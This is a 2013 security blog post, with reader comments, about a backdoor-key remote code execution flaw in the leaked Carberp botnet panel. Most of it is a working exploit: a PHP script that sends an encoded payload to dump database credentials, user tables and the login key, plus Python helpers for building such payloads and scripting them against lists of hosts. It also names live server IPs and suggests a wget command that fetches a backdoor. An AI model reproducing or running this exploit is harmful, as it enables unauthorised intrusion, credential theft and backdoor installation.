Friday, 28 June 2013

Carberp Remote Code Execution: Carpwned

Everyone is looking at the Carberp source, the bootkit and the other components, but has anyone investigated the panel's source?
I don't know who wrote the PHP, but he deserves a medal: it's even easier to hack than SpyEye. (Yeah, I didn't think that was possible either.)

Here I will talk about a simple code injection, but there are a lot of other vulnerabilities in these leaked panels.
e.g. sloppy code allows IP spoofing:

No but seriously, the best vulnerability is the RCE one. Whoever coded this had no business writing PHP:
look at this eval(), just look!

Oh, good timing, some Carberp C&C servers appeared on vx.vault:

Let's write a spl0it now, I think most of you came here for a PoC, right?
Carberp RCE
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php echo htmlspecialchars(basename($_SERVER['PHP_SELF'])); ?>">
<label for="urlz">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php
/*
Xyl2k!
Greeting to Xartrick for fixing the payload (:
*/
if (isset($_POST['urlz']))
{
    if (!filter_var($_POST['urlz'], FILTER_VALIDATE_URL))
    {
        echo "<font color='red'>URL is not valid</font>";
    }
    else
    {
        // 'id' is the hardcoded backdoor key the panel's index.php checks,
        // 'data' is the PHP payload, hex-encoded then base64-encoded, which
        // the panel decodes and eval()s once the key matches.
        $data = array(
            'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
            'data' => 'Njk2ZTYzNmM3NTY0NjU1ZjZmNmU2MzY1MjgyNzY5NmU2MzZjNzU2NDY1NzMyZjYzNmY2ZTY2Njk2NzJlNzA2ODcwMjcyOTNiMjQ0MTNkMjIwZDBhMjIzYjY1NjM2ODZmMjgyNzQ0NjE3NDYxNjI2MTczNjUyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDg2ZjczNzQzYTIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY4NmY3Mzc0Mjc1ZDJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc1NTczNjU3MjNhMjAyNzJlMjQ2MzY2Njc1ZjY0NjI1YjI3NzU3MzY1NzIyNzVkMmUyNDQxMjkzYjY1NjM2ODZmMjgyNzUwNjE3MzczM2EyMDI3MmUyNDYzNjY2NzVmNjQ2MjViMjc3MDYxNzM3MzI3NWQyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDQ0MjNhMjAyMDIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY0NjIyNzVkMmUyNDQxMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjYzNmY2ZTZlNjU2Mzc0MjgyNDYzNjY2NzVmNjQ2MjViMjc2ODZmNzM3NDI3NWQyYzI0NjM2NjY3NWY2NDYyNWIyNzc1NzM2NTcyMjc1ZDJjMjQ2MzY2Njc1ZjY0NjI1YjI3NzA2MTczNzMyNzVkMjkzYjZkNzk3MzcxNmM1ZjczNjU2YzY1NjM3NDVmNjQ2MjI4MjQ2MzY2Njc1ZjY0NjI1YjI3NjQ2MjI3NWQyOTNiMjQ0MjNkNmQ3OTczNzE2YzVmNzE3NTY1NzI3OTI4Mjc1MzQ1NGM0NTQzNTQyMDJhMjA0NjUyNGY0ZDIwNjI2NjVmNzU3MzY1NzI3MzI3MjkzYjY1NjM2ODZmMjgyNzU1NzM2NTcyNzMyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNzc2ODY5NmM2NTI4MjQ0MzNkNmQ3OTczNzE2YzVmNjY2NTc0NjM2ODVmNjE3MzczNmY2MzI4MjQ0MjI5Mjk2NTYzNjg2ZjI4MjQ0MzViMjc2YzZmNjc2OTZlMjc1ZDJlMjczYTI3MmUyNDQzNWIyNzcwNjE3MzczNzc2ZjcyNjQyNzVkMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjY2NzI2NTY1NWY3MjY1NzM3NTZjNzQyODI0NDIyOTNiNmQ3OTczNzE2YzVmNjM2YzZmNzM2NTI4MjkzYjI0NDQzZDQ5Mjg2NjY5NmM2NTVmNjc2NTc0NWY2MzZmNmU3NDY1NmU3NDczMjgyNzY5NmU2NDY1NzgyZTcwNjg3MDI3MjkyOTNiNjU2MzY4NmYyODI0NDEyZTI3NDE3NTc0NjgyMDRiNjU3OTI3MmUyNDQxMjkzYjY1NjM2ODZmMjgyNzJkMmQyZDJkMmQyZDJkMmQyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc2ODc0NzQ3MDNhMmYyZjI3MmUyNDVmNTM0NTUyNTY0NTUyNWIyNzQ4NTQ1NDUwNWY0ODRmNTM1NDI3NWQyZTI3MmY2YzZmNjc2OTZlMmYzZjc4M2QyNzJlMjQ0NDI5M2I2Njc1NmU2Mzc0Njk2ZjZlMjA0OTI4MjQ0ODI5N2IyNDQ2M2Q2NTc4NzA2YzZmNjQ2NTI4MjcyNDYxNzU3NDZmNzI2OTdhNjU2YjY1NzkyNzJjMjQ0ODI5M2IyNDQ3M2Q2NTc4NzA2YzZmNjQ2NTI4MjczYjI3MmMyNDQ2NWIzMTVkMjkzYjY1NzY2MTZjMjgyNzI0NDUyNzJlMjQ0NzViMzA1ZDJlMjczYjI3MjkzYjcyNjU3NDc1NzI2ZTIwMjQ0NTNiN2Q='
        );
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, rtrim($_POST['urlz'], '/') . "/index.php");
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
        curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        $contents = curl_exec($ch);
        curl_close($ch);
        // The payload prints '--------' separators, so a dash in the reply means it ran.
        // Output is escaped so a hostile panel can't XSS the operator's browser.
        if ($contents !== false && preg_match("#-#", $contents))
        { echo "<pre>" . htmlspecialchars($contents) . "</pre>"; }
        else
        { echo "<font color='red'>Not vulnerable :(</font>"; }
    }
}
?></td>
</tr>
</table>

The 'encoded' part is plain PHP, hex-encoded and then base64-encoded, which the panel decodes and eval()s once the 'id' matches the backdoor key. It does an include_once() of includes/config.php and echoes the $cfg_db values (host, user, pass, db).
Then it connects to the SQL db and dumps the users table with the Carberp credentials (in case we don't have phpMyAdmin).
But all that would be useless if we can't reach the login page because of the auth key, so it also reads index.php, extracts $autorizekey and prints the /login/?x=... URL.
Cool payload, huh?
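To make the payload format concrete, here is an added example in Python (my own code, not part of the original post or of the leaked panel). It reproduces the encoding the PoC above sends (PHP source, hex-encoded, then base64-encoded, posted as 'data' beside the backdoor 'id'), decodes the first 96 base64 characters of the blob above to show what they hide, recovers the PHP from a captured POST body, and pulls $autorizekey out of an index.php the way the payload's I() helper does. The sample PHP, the sample POST body and the index.php fragment are constructed here. The body parser assumes an application/x-www-form-urlencoded body; note that PHP's curl, given an array for CURLOPT_POSTFIELDS, actually sends multipart/form-data, so adapt the parsing before pointing it at a real capture.

```python
"""Added example: Carberp panel backdoor payload helpers (not the page's or the panel's code)."""
import base64
import binascii
import re
from typing import Optional
from urllib.parse import parse_qs, urlencode

# Backdoor key the leaked panel's index.php checks (taken from the PoC above).
BACKDOOR_ID = "BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV"

# First 96 base64 characters of the 'data' blob in the PoC above; they decode
# to the payload's first statement.
PAGE_BLOB_PREFIX = ("Njk2ZTYzNmM3NTY0NjU1ZjZmNmU2MzY1MjgyNzY5NmU2MzZjNzU2NDY1NzMyZjYz"
                    "NmY2ZTY2Njk2NzJlNzA2ODcwMjcyOTNi")


def encode_payload(php: str) -> str:
    """PHP source -> lowercase hex -> base64, the format the panel eval()s.
    latin-1 keeps the encoding byte-transparent for 8-bit PHP sources."""
    hexed = binascii.hexlify(php.encode("latin-1")).decode("ascii")
    return base64.b64encode(hexed.encode("ascii")).decode("ascii")


def decode_payload(blob: str) -> str:
    """Reverse of encode_payload: base64 -> hex -> PHP source.
    Raises binascii.Error / ValueError on anything that is not the expected format."""
    hexed = base64.b64decode(blob.encode("ascii"), validate=True)
    return binascii.unhexlify(hexed).decode("latin-1")


def build_form(php: str) -> dict:
    """The two POST fields the PoC sends to <panel>/index.php."""
    return {"id": BACKDOOR_ID, "data": encode_payload(php)}


def form_to_body(form: dict) -> str:
    """Serialise the fields as a urlencoded body ('+' and '=' in base64 get escaped)."""
    return urlencode(form)


def recover_php_from_body(body: str) -> Optional[str]:
    """Given a raw urlencoded POST body (constructed here; a real capture may be
    multipart), return the PHP the panel would eval(), or None if the body does
    not carry the backdoor id or the data is not base64(hex(php))."""
    fields = parse_qs(body, keep_blank_values=True)
    ids = fields.get("id", [])
    if not ids or not ids[0].startswith("BOTNETCHECKUPDATER0-"):
        return None
    data = fields.get("data", [""])[0]
    try:
        return decode_payload(data)
    except (binascii.Error, ValueError):
        return None


# Same idea as the payload's I(): locate the $autorizekey assignment in index.php.
AUTH_KEY_RE = re.compile(r"\$autorizekey\s*=\s*(['\"])(.*?)\1\s*;")


def extract_auth_key(index_php: str) -> Optional[str]:
    """Return the value assigned to $autorizekey (the 'x' parameter for /login/?x=),
    or None if index.php does not assign it."""
    m = AUTH_KEY_RE.search(index_php)
    return m.group(2) if m else None


if __name__ == "__main__":
    # Constructed sample payload, like the system('wget ...') idea in the post.
    form = build_form("system('id');")
    print(form)
    # What the blob on the page starts with.
    print(decode_payload(PAGE_BLOB_PREFIX))
    # Constructed captured POST body, decoded back to PHP.
    print(recover_php_from_body(form_to_body(form)))
    # Constructed index.php fragment (hypothetical key value).
    print(extract_auth_key("<?php\n$autorizekey = 'K3yFromIndex';\n?>"))
```

Run it as a script to see the four results; the same functions can be imported to script the check against a list of hosts, or to turn a captured request back into readable PHP before deciding what an attacker actually ran on a panel.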
Let's test it, then...

37.221.165.123:

91.214.202.117:

I've tested it on some other C&C servers and everything went fine.
And since it's RCE you can execute whatever you like, e.g. system('wget http://xxx.xxx');
to download a backdoor or whatever...

Here are some screenshots of the panel:

Bots:

Diagram all:

Diagram live:

Diagram OS:

Diagram AV:

Diagram Rights:
Wait... a 'diagram' ?!

Tasks:

Logs:

Passwd:

AutoSystem:

Settings:
Oh really? Who's fucked now?

35 comments:

  1. End up getting "URL is not valid"

  2. Very creative thinking to include the config.php file and then just echoing out the local variables that way

  3. Very handy, but now that it's exposed, people who know how to code will end up fixing it.

    But it will come in handy for the kids.

  4. nice one with kornheiser

  5. Another brutal ownage

  6. Maybe it was intentionally left vulnerable as a backdoor to buyers' panels..

  7. You can find a few separate RCE vulns if you look around at some of the other web-accessible files.

    Replies
    1. yep, this is not the only one, the panel is full of critical bugs.

    2. Yep. I think it's the most shittily coded PHP malware panel I've ever seen, which is pretty funny considering the price tag on this thing.

    3. I am curious, what is your preferred approach to finding holes in such software? Do you grep for things like eval() and SQL statements, or look at every file in order, or use automated scanners? A lot of people just fly by the seat of their pants, but I get the impression that there's method to your madness

    4. I'm also wondering, really interested.

    5. A few 'simple example' articles answering your questions (how to find...) you will find at http://HauntIT.blogspot.com

      cheers

  8. Won't be surprised if it was just one person who coded the entire project.

  9. How about you try to "exploit" the Zeus panel, :)

  10. I am curious, did you learn about programming and everything else at university or are you self-taught?

    Also, know any good tutorials for beginners?

  11. Not actually an RCE. Maybe you think this key was the same on every C&C installation? Nope.

    Replies
    1. It's the same on every C&C, install Carberp on different servers and you will see.
      Do you even know what you are talking about?

    2. I'm not the guy you were talking to but I just checked it, I tend to get results but they all look like this

      (E¿¦g„±S^K ¨‘fyÆ}Ð N*£¤rÅÖt¾¤Ì} è뀡y)

    3. Of course I know what I'm talking about.
      Did you see Carberp C&Cs' insides before the source leakage? I did. And I know a lot of different backdoor keys (BOTNETCHECKUPDATER0-xxx). Before the leakage, every single client had its own ionCubed C&C with a different backdoor key.
      Now, when script kiddies have started installing leaked Carberp C&Cs, we can expect C&Cs with the same backdoor key.

    4. Okay, I got no opportunity to look at other Carberp panels before this leak, so I don't know what the non-leaked versions look like or whether they are different.
      For the moment all the Carberp panels I looked into were from the leaked package and obviously all use the same key.
      This is why I said I tried on different servers and everything was correctly exploited.

  12. LMFAO, when you see it in the PHP documentation ... http://php.net/manual/en/function.eval.php

  13. Metasploit module can be found here:
    http://packetstormsecurity.com/files/122230/carberp_backdoor_exec.rb.txt

  14. B-but your PoC is vuln to XSS! What if the evil C&C serves a browser exploit!

    Just kidding, thanks for the good read as always :)

  15. How do you find Carberp panels?

  16. Writer, can you explain in Sesame Street lingo what you have just done? What can be done with these vulnerabilities?

  17. kiddie audience listens :-P

  18. MASTER, please teach us how to find Carberp panels

  19. Fatal error: Call to undefined function curl_init()

    I don't know how that is; I renamed it to .php and opened it via localhost ;) ???

  20. I think you don't have curl/php_curl installed

  21. Lol, these people call themselves malware coders?
    This shit wasn't even worth $1.